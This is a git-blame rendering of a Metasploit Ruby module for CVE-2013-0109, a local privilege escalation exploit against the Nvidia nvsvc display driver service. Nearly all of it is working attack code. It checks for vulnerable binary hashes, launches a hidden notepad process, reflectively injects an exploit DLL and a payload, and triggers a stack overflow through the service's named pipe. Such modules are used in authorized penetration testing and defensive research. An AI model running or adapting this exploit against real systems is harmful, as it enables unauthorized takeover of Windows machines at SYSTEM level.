2013-07-05 18:48:27 +00:00
|
|
|
##
|
2013-12-15 00:44:07 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2013-07-05 18:48:27 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
require 'msf/core/post/common'
|
|
|
|
require 'msf/core/post/windows/priv'
|
|
|
|
require 'msf/core/post/windows/process'
|
2013-12-10 10:49:10 +00:00
|
|
|
require 'msf/core/post/windows/reflective_dll_injection'
|
2013-07-05 21:25:04 +00:00
|
|
|
require 'msf/core/post/windows/services'
|
2013-07-05 18:48:27 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Local
|
2013-12-05 21:37:40 +00:00
|
|
|
Rank = AverageRanking
|
|
|
|
|
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::Priv
|
|
|
|
include Msf::Post::Windows::Process
|
2013-12-10 10:49:10 +00:00
|
|
|
include Msf::Post::Windows::ReflectiveDLLInjection
|
2013-12-05 21:37:40 +00:00
|
|
|
include Msf::Post::Windows::Services
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info, {
|
|
|
|
'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
|
|
|
|
'Description' => %q{
|
|
|
|
The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
|
|
|
|
interact with the service. It contains a stacked based buffer overflow as a result
|
2013-12-16 20:57:33 +00:00
|
|
|
of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',
|
|
|
|
the service name is 'nvsvc', and the named pipe is 'nsvr'.
|
2013-12-05 21:37:40 +00:00
|
|
|
|
|
|
|
This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
|
2013-12-16 20:57:33 +00:00
|
|
|
It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.
|
2013-12-05 21:37:40 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'Peter Wintersmith', # Original exploit
|
2014-04-09 15:46:10 +00:00
|
|
|
'Ben Campbell', # Metasploit integration
|
2013-12-05 21:37:40 +00:00
|
|
|
],
|
|
|
|
'Arch' => ARCH_X86_64,
|
|
|
|
'Platform' => 'win',
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2013-12-15 00:42:52 +00:00
|
|
|
[ 'Windows x64', { } ]
|
2013-12-05 21:37:40 +00:00
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 2048,
|
|
|
|
'DisableNops' => true,
|
|
|
|
'BadChars' => "\x00"
|
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2013-0109' ],
|
|
|
|
[ 'OSVDB', '88745' ],
|
|
|
|
[ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Dec 25 2012',
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
}))
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
vuln_hashes = [
|
|
|
|
'43f91595049de14c4b61d1e76436164f',
|
|
|
|
'3947ad5d03e6abcce037801162fdb90d',
|
|
|
|
'3341d2c91989bc87c3c0baa97c27253b'
|
|
|
|
]
|
|
|
|
|
|
|
|
os = sysinfo["OS"]
|
|
|
|
if os =~ /windows/i
|
|
|
|
svc = service_info 'nvsvc'
|
|
|
|
if svc and svc['Name'] =~ /NVIDIA/i
|
|
|
|
vprint_good("Found service '#{svc['Name']}'")
|
|
|
|
|
|
|
|
begin
|
2013-12-10 21:43:34 +00:00
|
|
|
if is_running?
|
2014-01-20 20:26:10 +00:00
|
|
|
vprint_good("Service is running")
|
2013-12-10 21:43:34 +00:00
|
|
|
else
|
2014-01-20 20:26:10 +00:00
|
|
|
vprint_error("Service is not running!")
|
2013-12-05 21:37:40 +00:00
|
|
|
end
|
|
|
|
rescue RuntimeError => e
|
2014-01-20 20:26:10 +00:00
|
|
|
vprint_error("Unable to retrieve service status")
|
|
|
|
return Exploit::CheckCode::Unknown
|
2013-12-05 21:37:40 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
if sysinfo['Architecture'] =~ /WOW64/i
|
2013-12-15 01:05:19 +00:00
|
|
|
path = svc['Command'].gsub('"','').strip
|
|
|
|
path.gsub!("system32","sysnative")
|
2013-12-05 21:37:40 +00:00
|
|
|
else
|
2013-12-15 00:42:52 +00:00
|
|
|
path = svc['Command'].gsub('"','').strip
|
2013-12-05 21:37:40 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
begin
|
|
|
|
hash = client.fs.file.md5(path).unpack('H*').first
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
|
|
print_error("Error checking file hash: #{e}")
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
end
|
|
|
|
|
|
|
|
if vuln_hashes.include?(hash)
|
|
|
|
vprint_good("Hash '#{hash}' is listed as vulnerable")
|
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
else
|
|
|
|
vprint_status("Hash '#{hash}' is not recorded as vulnerable")
|
|
|
|
return Exploit::CheckCode::Detected
|
|
|
|
end
|
|
|
|
else
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def is_running?
|
|
|
|
begin
|
|
|
|
status = service_status('nvsvc')
|
|
|
|
return (status and status[:state] == 4)
|
|
|
|
rescue RuntimeError => e
|
|
|
|
print_error("Unable to retrieve service status")
|
|
|
|
return false
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
2013-12-08 18:54:25 +00:00
|
|
|
if is_system?
|
|
|
|
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
2013-12-05 21:37:40 +00:00
|
|
|
end
|
|
|
|
|
2013-12-08 18:54:25 +00:00
|
|
|
unless check == Exploit::CheckCode::Vulnerable
|
|
|
|
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
|
|
|
end
|
2013-12-05 21:37:40 +00:00
|
|
|
|
2013-12-08 18:54:25 +00:00
|
|
|
print_status("Launching notepad to host the exploit...")
|
2013-12-15 00:42:52 +00:00
|
|
|
|
2013-12-19 01:43:59 +00:00
|
|
|
windir = session.sys.config.getenv('windir')
|
2013-12-15 00:42:52 +00:00
|
|
|
cmd = "#{windir}\\SysWOW64\\notepad.exe"
|
|
|
|
process = client.sys.process.execute(cmd, nil, {'Hidden' => true})
|
2013-12-08 18:54:25 +00:00
|
|
|
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
|
|
|
print_good("Process #{process.pid} launched.")
|
2013-12-05 21:37:40 +00:00
|
|
|
|
2013-12-08 18:54:25 +00:00
|
|
|
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
2013-12-15 00:42:52 +00:00
|
|
|
library_path = ::File.join(Msf::Config.data_directory,
|
|
|
|
"exploits",
|
|
|
|
"CVE-2013-0109",
|
|
|
|
"nvidia_nvsvc.x86.dll")
|
2013-12-08 18:54:25 +00:00
|
|
|
library_path = ::File.expand_path(library_path)
|
2013-12-05 21:37:40 +00:00
|
|
|
|
2013-12-08 18:54:25 +00:00
|
|
|
print_status("Injecting exploit into #{process.pid} ...")
|
|
|
|
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
|
2013-12-05 21:37:40 +00:00
|
|
|
|
2013-12-08 18:54:25 +00:00
|
|
|
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
|
|
|
payload_mem = inject_into_process(host_process, payload.encoded)
|
2013-12-05 21:37:40 +00:00
|
|
|
|
2013-12-08 18:54:25 +00:00
|
|
|
# invoke the exploit, passing in the address of the payload that
|
|
|
|
# we want invoked on successful exploitation.
|
|
|
|
print_status("Payload injected. Executing exploit...")
|
|
|
|
host_process.thread.create(exploit_mem + offset, payload_mem)
|
2013-12-05 21:37:40 +00:00
|
|
|
|
2013-12-08 18:54:25 +00:00
|
|
|
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
|
2013-12-05 21:37:40 +00:00
|
|
|
end
|
2013-07-05 18:48:27 +00:00
|
|
|
end
|
2013-07-05 21:25:04 +00:00
|
|
|
|